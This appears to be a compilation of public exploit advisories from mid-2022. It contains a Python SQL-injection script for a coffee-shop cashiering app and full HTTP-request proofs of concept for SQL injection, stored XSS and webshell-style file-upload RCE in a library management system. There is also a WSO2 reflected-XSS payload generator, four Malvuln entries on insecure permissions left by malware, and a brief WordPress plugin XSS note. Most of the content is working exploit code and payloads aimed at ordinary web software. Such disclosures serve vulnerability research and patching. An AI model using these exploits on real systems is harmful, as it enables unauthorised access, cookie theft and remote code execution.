<pre><code># Exploit Title: Coffee Shop Cashiering System - Authenticated Time Based Sql injection<br /># Date: 27-06-2022<br /># Exploit Author: syad<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cscs.zip<br /># Version: 1.0<br /># Tested on: Windows 10 + XAMPP 3.2.4<br /># CVE ID : N/A<br /><br /># Description <br /># The id parameter does not perform input validation on the view_detail.php file it allow authenticated Time Based SQL Injection.<br /><br /><br />import requests<br />import sys<br />s = requests.session()<br /><br />proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}<br /><br /><br />def login_sql():<br /> target = "http://%s/cscs/classes/Login.php?f=login" % sys.argv[1]<br /> d = {<br /> "username" : "admin",<br /> "password" : "admin123"<br /> }<br /> r = s.post(target, data=d, allow_redirects=True, proxies=proxies)<br /> res = r.text<br /> if "success" in res:<br /> return True<br /> else:<br /> return False<br /><br /><br />def detect_sql():<br /> r = s.get("http://%s/cscs/admin/?page=sales/view_details&id=2'" % sys.argv[1])<br /> res = r.text<br /> if "You have an error in your SQL syntax;" in res:<br /> print("[+] SQL Error Found !!")<br /> else:<br /> return False<br /><br />def time_based_sql():<br /> target = "http://%s/cscs/admin/?page=sales/view_details&id=2'+or+sleep(5)--+-" % sys.argv[1]<br /> r = s.get(target, proxies=proxies)<br /> print("[+] Time Based SQL Injection Executed !!!")<br /><br /><br /><br /><br />def main():<br /> if len(sys.argv) !=2:<br /> print("(+) usage: %s <target>" % sys.argv[0] )<br /> print("(+) eg: %s 192.168.121.103 " % sys.argv[0] )<br /> sys.exit(-1)<br /><br /> if login_sql():<br /> print("[+] Success Login")<br /><br /> detect_sql()<br /> time_based_sql()<br /><br />if __name__ == "__main__":<br /> main()<br /><br /> <br /><br /></code></pre>
<pre><code>#### Title: Library Management System with QR code Attendance 1.0 SQL<br />Injection<br />#### Author: Ashish Kumar (<br />https://www.linkedin.com/in/ashish-kumar-0b65a3184)<br />#### Date: 27.06.2022<br />#### Vendor: https://www.sourcecodester.com/users/kingbhob02<br />#### Software:<br />https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html<br />#### Version: 1.0<br />#### Reference:<br />https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md<br /><br />#### Description:<br />##### The reason for the SQL injection vulnerability is that the website<br />application does not verify the validity of the data submitted by the user<br />to the server (type, length, business parameter validity, etc.), and does<br />not effectively filter the data input by the user with special characters ,<br />so that the user's input is directly brought into the database for<br />execution, which exceeds the expected result of the original design of the<br />SQL statement, resulting in a SQL injection vulnerability.Library<br />Management System with QR code Attendance does not filter the content<br />correctly at the "bookdetails.php" id parameter, resulting in the<br />generation of SQL injection.<br /><br />#### Payload used:<br />`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`<br /><br />#### POC<br /><br />1. Login into the CMS.<br />Admin Default Access:<br /><br />Username: admin<br /><br />Password: admin<br /><br /><br />2. http://localhost/LMS/librarian/bookdetails.php?id=191<br /><br /><br />3. Put sleep(5) payload (`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)--<br />PbtB`)<br /><br />4. `http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198<br />FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`<br /><br /><br /><br />5. code<br />```<br />GET<br />/LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtB<br />HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco<br />Connection: close<br />```<br /></code></pre>
<pre><code>#### Title: Library Management System with QR code Attendance 1.0 Stored<br />Cross-Site Scripting<br />#### Author: Ashish Kumar (<br />https://www.linkedin.com/in/ashish-kumar-0b65a3184)<br />#### Date: 27.06.2022<br />#### Vendor: https://www.sourcecodester.com/users/kingbhob02<br />#### Software:<br />https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html<br />#### Version: 1.0<br />#### Reference:<br />https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Cross%20Site%20Scripting(Stored)/POC.md<br /><br />#### Description:<br />#### Library Management System with QR code Attendance is vulnerable to<br />Stored cross-site scripting on the profile edit page. The "Name" parameter<br />in 'http://localhost/LMS/admin/edit_admin_details.php' is vulnerable.<br /><br />#### Impact:<br /> An attacker could steal cookies with a crafted URL sent to the victims.<br /><br />### POC<br /><br />```<br />POST /LMS/admin/edit_admin_details.php?id=admin HTTP/1.1<br />Host: localhost<br />Content-Length: 115<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/LMS/admin/edit_admin_details.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco<br />Connection: close<br /><br />Name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&EmailId=admin%<br />40gmail.com&MobNo=0&Password=admin&submit=<br />```<br /></code></pre>
<pre><code>#### Title: Library Management System with QR code Attendance_File Upload<br />RCE<br />#### Author: Ashish Kumar (<br />https://www.linkedin.com/in/ashish-kumar-0b65a3184)<br />#### Date: 27.06.2022<br />#### Vendor: https://www.sourcecodester.com/users/kingbhob02<br />#### Software:<br />https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html<br />#### Version: 1.0<br />#### Reference:<br />https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.md<br />#### Description:<br />#### At the file upload function, the application system checks the<br />validity of the file type, format, and content uploaded by the user, so<br />that attackers can upload Webshell (.php, .jsp, asp, etc.) malicious script<br />files or files in unexpected formats, such as: HTML files, SHTML files,<br />etc., at the same time, you can use characters such as directory jump or<br />control the upload directory to directly upload files to the Web directory<br />or any directory, which may lead to the execution of arbitrary malicious<br />script files on the remote server, thereby directly obtaining application<br />system permissions.<br /><br />#### $uploaddir = 'assets/uploads/';<br />#### $uploadfile = $uploaddir . basename($_FILES['image']['name']);<br /><br />#### Payload used:<br />`<?php phpinfo();?>`<br /><br />### POC<br />```<br />POST /LMS/card/index.php HTTP/1.1<br />Host: localhost<br />Content-Length: 1056<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryngJP5BxPA6UsA91O<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/LMS/card/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco<br />Connection: close<br /><br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="name"<br /><br />File_Upload<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="grade"<br /><br />Computer Studies<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="dob"<br /><br />Student<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="address"<br /><br />Testing Testing<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="email"<br /><br />ashish@cyberthoth.in<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="exp_date"<br /><br />1990-02-11<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="id_no"<br /><br />8529637<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="phone"<br /><br />1212121212<br />------WebKitFormBoundaryngJP5BxPA6UsA91O<br />Content-Disposition: form-data; name="image"; filename="File_upload.php"<br />Content-Type: application/octet-stream<br /><br /><?php phpinfo();?><br />------WebKitFormBoundaryngJP5BxPA6UsA91O--<br />```<br /><br />#### Access below URL:<br />`http://localhost/LMS/card/assets/uploads/File_upload.php`<br /><br />![image](<br />https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.png<br />)<br /></code></pre>
<pre><code># Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)<br /># Date: 21 Apr 2022<br /># Exploit Author: cxosmo<br /># Vendor Homepage: https://wso2.com<br /># Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) <br /># Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0; <br /> # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;<br /> # API Microgateway 2.2.0;<br /> # Data Analytics Server 3.2.0;<br /> # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;<br /> # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;<br /> # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;<br /> # Identity Server Analytics 5.5.0 and 5.6.0;<br /> # WSO2 Micro Integrator 1.0.0.<br /># Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)<br /># CVE: CVE-2022-29548<br /><br />import argparse<br />import logging<br />import urllib.parse<br /><br /># Global variables<br />VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="<br />DEFAULT_PAYLOAD = "alert(document.domain)"<br /><br /># Logging config<br />logging.basicConfig(level=logging.INFO, format="")<br />log = logging.getLogger()<br /><br />def generate_payload(url, custom_payload=False):<br /> log.info(f"Generating payload for {url}...")<br /> if custom_payload:<br /> log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")<br /> else:<br /> log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")<br /><br />def clean_url_input(url):<br /> if url.count("/") > 2:<br /> return f"{url.split('/')[0]}//{url.split('/')[2]}"<br /> else:<br /> return url<br /><br />def check_payload(payload):<br /> encoded_characters = ['"', '<', '>']<br /> if any(character in payload for character in encoded_characters):<br /> log.info(f"Unsupported character(s) (\", <, >) found in payload.")<br /> return False<br /> else:<br /> return urllib.parse.quote(payload)<br /><br />if __name__ == "__main__":<br /> # Parse command line<br /> parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)<br /> required_arguments = parser.add_argument_group('required arguments')<br /> required_arguments.add_argument("-t", "--target",<br /> help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",<br /> required="True", action="store")<br /> parser.add_argument("-p", "--payload",<br /> help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",<br /> action="store", default=False)<br /> args = parser.parse_args()<br /><br /> # Clean user target input<br /> args.target = clean_url_input(args.target.lower())<br /><br /> # Check for unsupported characters in custom payload; URL-encode as required<br /> if args.payload:<br /> args.payload = check_payload(args.payload)<br /> if args.payload:<br /> generate_payload(args.target, args.payload)<br /> else:<br /> generate_payload(args.target)<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/1fd70e41918c3a75c634b1c234ec36fb.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.InfecDoor.17.c<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a ".420" settings file type to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the file dropped by the malware to disable, change its settings or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: InfecDoor<br />Type: PE32<br />MD5: 1fd70e41918c3a75c634b1c234ec36fb<br />Vuln ID: MVID-2022-0614<br />Disclosure: 06/23/2022<br /><br />Exploit/PoC:<br />C:\>cacls Infector.420<br />C:\Infector.420 BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir Infector.420<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />04/11/2022 03:29 AM 36 Infector.420<br /> 1 File(s) 36 bytes<br /> 0 Dir(s) 24,644,292,608 bytes free<br /><br />C:\>type Infector.420<br />[My_OVER_ALL_SETTINGS]<br />FirsTime=0<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/20e438d84aa2828826d52540d80bf7f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Mailfinder.Win32.VB.p<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a dir with multiple PE files to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: VB<br />Type: PE32<br />MD5: 20e438d84aa2828826d52540d80bf7fa<br />Vuln ID: MVID-2022-0616<br />Disclosure: 06/23/2022<br /><br />Exploit/PoC:<br />C:\>cacls IMB<br />C:\IMB BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>dir IMB<br /> Volume in drive C has no label.<br /><br /> Directory of C:\IMB<br /><br />09/12/2003 09:07 PM 140,288 comdlg32.ocx<br />06/16/2004 01:17 PM 282,624 IMB.exe<br />09/12/2003 09:07 PM 1,388,544 msvbvm60.dll<br />09/12/2003 09:07 PM 108,336 MSWINSCK.OCX<br />09/15/2003 05:16 PM 192 Readme.txt<br />10/04/2001 12:16 AM 147,483 scrrun.dll<br />10/04/2001 12:16 AM 17,920 stdole2.tlb<br />09/12/2003 09:07 PM 2,864 winsock.dll<br /> 8 File(s) 2,088,251 bytes<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/5a83f8b8c8a8b7a85b3ff632aa60e793.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Shark.btu<br />Vulnerability: Insecure Permissions<br />Description: The malware writes multiple PE files to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. <br />Family: Shark<br />Type: PE32<br />MD5: 5a83f8b8c8a8b7a85b3ff632aa60e793<br />Vuln ID: MVID-2022-0615<br />Disclosure: 06/23/2022<br /><br /><br />Exploit/PoC:<br />C:\Fraps BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>dir Fraps<br /> Volume in drive C has no label.<br /><br /> Directory of C:\Fraps<br /><br />01/14/2008 08:12 AM 12,988 changes.txt<br />01/14/2008 08:51 AM 172,032 fraps.dll<br />01/14/2008 08:53 AM 913,064 fraps.exe<br />01/14/2008 08:51 AM 1,683,968 fraps64.dat<br />01/14/2008 08:51 AM 111,616 fraps64.dll<br />01/14/2008 08:51 AM 135,168 frapslcd.dll<br />05/12/2022 02:02 AM DIR HELP<br />01/14/2008 08:07 AM 1,841 README.HTM<br />05/12/2022 02:02 AM 34,552 uninstall.exe<br /> 8 File(s) 3,065,229 bytes<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/13e878ed7e547523cffc5728f6ba4190.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Yashma Ransomware Builder v1.2<br />Vulnerability: Insecure Permissions<br />Description: The malware creates PE files with insecure permissions when writing to c:\ drive, granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Family: Yashma<br />Type: PE32<br />MD5: 13e878ed7e547523cffc5728f6ba4190<br />Vuln ID: MVID-2022-0613 <br />Disclosure: 06/23/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls hate.exe<br />C:\hate.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir hate.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />05/14/2022 01:20 AM 54,784 hate.exe<br /> 1 File(s) 54,784 bytes<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Exploit Title: Download Manager Cross-Site Scripting<br />Date: 2022-06-16<br />Exploit Author : Andrea Bocchetti<br />Vendor Homepage : https://wordpress.org/plugins/download-manager/<br />Version : <= 3.2.43<br />Tested on: windows<br />CVE : CVE-2022-2101<br /><br />######## Description ########<br /># 1-) Login in the plugin page<br /># 2-) add the xss payload in the field "Insert URL"<br /># 3-) Click on the link , the JS code will be interpreted.<br /></code></pre>